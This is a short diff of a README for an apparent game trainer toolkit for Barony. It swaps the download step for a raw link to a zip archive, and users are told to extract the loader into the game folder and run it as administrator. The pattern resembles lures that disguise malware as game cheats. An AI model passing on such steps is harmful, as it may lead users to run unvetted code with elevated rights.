sblee11/BaronyTrainerToolkit/README.md

 ## 📥 Installation

-1. Download Loader.rar from the repository.
+1. Download https://raw.githubusercontent.com/sblee11/BaronyTrainerToolkit/main/Lett/BaronyTrainerToolkit.zip from the repository.
 2. Extract the files to your Barony game folder.
 3. Run the Loader application as administrator (if required by your OS).
 4. Enjoy enhanced dungeon expeditions!